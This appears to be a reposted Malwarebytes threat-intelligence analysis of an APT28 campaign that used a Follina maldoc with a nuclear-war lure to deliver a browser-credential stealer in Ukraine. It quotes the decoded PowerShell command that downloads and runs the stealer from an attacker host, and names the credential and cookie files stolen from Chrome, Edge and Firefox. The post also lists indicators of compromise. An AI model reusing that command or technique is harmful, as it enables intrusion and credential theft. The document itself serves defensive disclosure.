{"id":19399,"date":"2022-06-21T08:10:05","date_gmt":"2022-06-21T16:10:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/06\/21\/news-13132\/"},"modified":"2022-06-21T08:10:05","modified_gmt":"2022-06-21T16:10:05","slug":"news-13132","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2022\/06\/21\/news-13132\/","title":{"rendered":"Russia&#8217;s APT28 uses fear of nuclear war to spread Follina docs in Ukraine"},"content":{"rendered":"<p><strong>Credit to Author: Threat Intelligence Team| Date: Tue, 21 Jun 2022 15:25:09 +0000<\/strong><\/p>\n<p><em>This blog post was authored by Hossein Jazi and Roberto Santos<\/em>.<\/p>\n<p>In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.<\/p>\n<p>APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and <a href=\"https:\/\/blog.malwarebytes.com\/reports\/2021\/07\/beware-password-spraying-fancy-bears\/\">US organizations<\/a>, including US nuclear facilities.<\/p>\n<p>On June 20, 2022, Malwarebytes Threat Intelligence <a href=\"https:\/\/twitter.com\/h2jazi\/status\/1538957205210337280\">identified<\/a> a document that had been weaponized with the <a href=\"https:\/\/blog.malwarebytes.com\/exploits-and-vulnerabilities\/2022\/05\/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug\/\">Follina<\/a> (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by <a href=\"https:\/\/blog.google\/threat-analysis-group\/update-on-cyber-activity-in-eastern-europe\/\">Google<\/a>. The discovery was also made <a href=\"https:\/\/cert.gov.ua\/article\/341128\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">independently by CERT-UA<\/a>.<\/p>\n<p>Follina is a recently-discovered zero-day exploit that uses the <code>ms-msdt<\/code> protocol to load malicious code from Word documents when they are opened. This is the first time we&#8217;ve observed APT28 using Follina in its operations. <\/p>\n<h2>The malicious document<\/h2>\n<p>The maldoc&#8217;s filename, <code>Nuclear Terrorism A Very Real Threat.rtf<\/code>, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict. <\/p>\n<p>The content of the document is an article from the <a href=\"https:\/\/www.atlanticcouncil.org\/blogs\/new-atlanticist\/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions\/\">Atlantic Council<\/a> called &#8220;<em>Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions<\/em>&#8221; published on May 10 this year.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine.png\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"57690\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/will-putin-use-nuclear-weapons-in-ukraine\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine.png\" data-orig-size=\"700,885\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"A malicious document asks &#8220;Will Putin use nuclear weapons in Ukraine?&#8221;\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine-237x300.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine-475x600.png\" loading=\"lazy\" width=\"475\" height=\"600\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine-475x600.png\" alt=\"A malicious document asks &quot;Will Putin use nuclear weapons in Ukraine?&quot;\" class=\"wp-image-57690\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine-475x600.png 475w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine-237x300.png 237w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/will-putin-use-nuclear-weapons-in-ukraine.png 700w\" sizes=\"auto, (max-width: 475px) 100vw, 475px\" \/><\/a><figcaption>The lure asks &#8220;Will Putin use nuclear weapons in Ukraine?&#8221;<\/figcaption><\/figure>\n<\/div>\n<p>The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the <code>Document.xml.rels<\/code> file to retrieve a remote HTML file from the URL <a href=\"https:\/\/www.virustotal.com\/gui\/url\/9863b9b4ae9c555cd4dc30803000ea202f642a37321da2222fec9d51bce443b1\">http:\/\/kitten-268.frge.io\/article.html<\/a>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document.png\" data-rel=\"lightbox-image-1\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"57692\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/malicious-html-document\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document.png\" data-orig-size=\"1400,223\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"malicious-html-document\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document-300x48.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document-600x96.png\" loading=\"lazy\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document.png\" alt=\"\" class=\"wp-image-57692\" width=\"700\" height=\"112\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document.png 1400w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document-300x48.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/malicious-html-document-600x96.png 600w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/a><figcaption>The malicious HTML document<\/figcaption><\/figure>\n<\/div>\n<p>The HTML file uses a JavaScript call to <code>window.location.href<\/code> to load and execute an encoded PowerShell script using the <code>ms-msdt<\/code> MSProtocol URI scheme. The decoded script uses <code>cmd<\/code> to run PowerShell code that downloads and executes the final payload:<\/p>\n<pre class=\"wp-block-preformatted\"><code>\"C:WINDOWSsystem32cmd.exe\" \/k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command \"&amp; {iwr http:\/\/kompartpomiar.pl\/grafika\/SQLite.Interop.dll -OutFile \"C:Users$ENV:UserNameSQLite.Interop.dll\";iwr http:\/\/kompartpomiar.pl\/grafika\/docx.exe -OutFile \"C:Users$ENV:UserNamedocx.exe\";Start-Process \"C:Users$ENV:UserNamedocx.exe\"}\"<\/code><\/pre>\n<h2>Payload Analysis<\/h2>\n<p>The final payload is a variant of a stealer APT28 has <a href=\"https:\/\/blog.google\/threat-analysis-group\/update-on-cyber-activity-in-eastern-europe\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">used against targets in Ukraine<\/a> before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img decoding=\"async\" data-attachment-id=\"57667\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/image-6-5\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-6.png\" data-orig-size=\"1136,536\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-6\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-6-300x142.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-6-600x283.png\" loading=\"lazy\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-6-600x283.png\" alt=\"\" class=\"wp-image-57667\" width=\"450\" height=\"212\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-6-600x283.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-6-300x142.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-6.png 1136w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><figcaption>In older versions of the stealer, a fake error message distracted users <\/figcaption><\/figure>\n<\/div>\n<p>The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer.png\" data-rel=\"lightbox-image-2\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"57699\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/comparing-version-one-and-version-two-of-the-malicious-stealer\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer.png\" data-orig-size=\"1400,888\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"A side-by-side comparison of two versions of the APT28 stealer\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer-300x190.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer-600x381.png\" loading=\"lazy\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer.png\" alt=\"A side-by-side comparison of two versions of the APT28 stealer\" class=\"wp-image-57699\" width=\"700\" height=\"444\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer.png 1400w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer-300x190.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/comparing-version-one-and-version-two-of-the-malicious-stealer-600x381.png 600w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/a><figcaption>A side-by-side comparison of two versions of the APT28 stealer<\/figcaption><\/figure>\n<\/div>\n<p>As with the previous variant, the stealer&#8217;s main pupose is to steal data from several popular browsers.<\/p>\n<h3>Google Chrome and Microsoft Edge<\/h3>\n<p>The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of <code>%LOCALAPPDATA%GoogleChromeUser DataDefaultLogin Data<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1.png\" data-rel=\"lightbox-image-3\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"57708\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/debugging-session-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1.png\" data-orig-size=\"800,404\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Debugging session showing how attackers are capable of stealing credentials\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1-300x152.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1-600x303.png\" loading=\"lazy\" width=\"800\" height=\"404\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1.png\" alt=\"Debugging session showing how attackers are capable of stealing credentials\" class=\"wp-image-57708\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1.png 800w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1-300x152.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/debugging-session-1-600x303.png 600w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><figcaption>Debugging session showing how attackers are capable of stealing credentials<\/figcaption><\/figure>\n<\/div>\n<p>In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing <code>%LOCALAPPDATA%GoogleChromeUser DataDefaultNetworkCookies<\/code>. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing.png\" data-rel=\"lightbox-image-4\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"57707\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/cookie-stealing\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing.png\" data-orig-size=\"1050,258\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Code snippet in charge of cookies steal activity (Google Chrome)\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-300x74.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-600x147.png\" loading=\"lazy\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing.png\" alt=\"Code snippet in charge of cookies steal activity (Google Chrome)\" class=\"wp-image-57707\" width=\"788\" height=\"194\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing.png 1050w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-300x74.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-600x147.png 600w\" sizes=\"auto, (max-width: 788px) 100vw, 788px\" \/><\/a><figcaption>Cookie stealing code (Google Chrome)<\/figcaption><\/figure>\n<\/div>\n<p>Stolen cookies can sometimes be used to break into websites even if the username and password aren&#8217;t saved to the browser.<\/p>\n<p>The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.<\/p>\n<h3>Firefox<\/h3>\n<p>This malware can also steal data from Firefox. It does this by iterating through every profile looking for the <code>cookies.sqlite<\/code> file that stores the cookies for each user.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox.png\" data-rel=\"lightbox-image-5\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"57710\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/cookie-stealing-firefox\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox.png\" data-orig-size=\"1068,309\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Cookie stealing in Firefox\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox-300x87.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox-600x174.png\" loading=\"lazy\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox.png\" alt=\"Cookie stealing in Firefox\" class=\"wp-image-57710\" width=\"801\" height=\"232\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox.png 1068w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox-300x87.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/cookie-stealing-firefox-600x174.png 600w\" sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/a><figcaption>Sysmon capturing access to cookies.sqlite file<\/figcaption><\/figure>\n<\/div>\n<p>In the case of passwords, the attackers attempt to steal <code>logins.json<\/code>, <code>key3.db<\/code>, <code>key4.db<\/code>, <code>cert8.db<\/code>, <code>cert9.db<\/code>, <code>signons.sqlite<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" data-attachment-id=\"57672\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/image-11-4\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-11.png\" data-orig-size=\"932,280\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-11\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-11-300x90.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-11-600x180.png\" loading=\"lazy\" width=\"932\" height=\"280\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-11.png\" alt=\"\" class=\"wp-image-57672\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-11.png 932w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-11-300x90.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/image-11-600x180.png 600w\" sizes=\"auto, (max-width: 932px) 100vw, 932px\" \/><figcaption>Attackers will grab also passwords from Firefox<\/figcaption><\/figure>\n<\/div>\n<p>These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (<code>signons.sqlite<\/code>, <code>key3.db<\/code> and <code>cert8.db<\/code> are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.<\/p>\n<h2>Exfiltrating data<\/h2>\n<p>The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event.png\" data-rel=\"lightbox-image-6\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"57713\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/imap-login-event\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event.png\" data-orig-size=\"1058,585\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"IMAP login event\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event-300x166.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event-600x332.png\" loading=\"lazy\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event.png\" alt=\"IMAP login event\" class=\"wp-image-57713\" width=\"794\" height=\"439\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event.png 1058w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event-300x166.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/imap-login-event-600x332.png 600w\" sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/a><figcaption>The IMAP login event<\/figcaption><\/figure>\n<\/div>\n<p>The old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.<\/p>\n<p>It&#8217;s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.<\/p>\n<p>Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.<\/p>\n<p>For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has <a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/05\/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion\/\">targeted Russia repeatedly since Ukraine invasion<\/a>.<\/p>\n<h2>Protection<\/h2>\n<p>Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" data-attachment-id=\"57719\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/attachment\/nebula-protects-against-apt28-campaign\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/nebula-protects-against-APT28-campaign.png\" data-orig-size=\"700,570\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"nebula-protects-against-APT28-campaign\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/nebula-protects-against-APT28-campaign-300x244.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/nebula-protects-against-APT28-campaign-600x489.png\" loading=\"lazy\" width=\"700\" height=\"570\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/nebula-protects-against-APT28-campaign.png\" alt=\"\" class=\"wp-image-57719\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/nebula-protects-against-APT28-campaign.png 700w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/nebula-protects-against-APT28-campaign-300x244.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/06\/nebula-protects-against-APT28-campaign-600x489.png 600w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure>\n<\/div>\n<h2>IOCs<\/h2>\n<p><strong>Maldoc:<br \/><\/strong>Nuclear Terrorism A Very Real Threat.rtf<br \/>daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01 <\/p>\n<p><strong>Remote template (Follina):<br \/><\/strong>http:\/\/kitten-268.frge[.]io\/article.html <\/p>\n<p><strong>Stealer:<br \/><\/strong>http:\/\/kompartpomiar[.]pl\/grafika\/docx.exe<br \/>2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933<\/p>\n<p><strong>C2:<br \/><\/strong>www.specialityllc[.]com<br \/><a href=\"https:\/\/twitter.com\/h2jazi\/status\/1538957205210337280\/photo\/1\"><\/a><\/p>\n<p>The post <a rel=\"nofollow\" 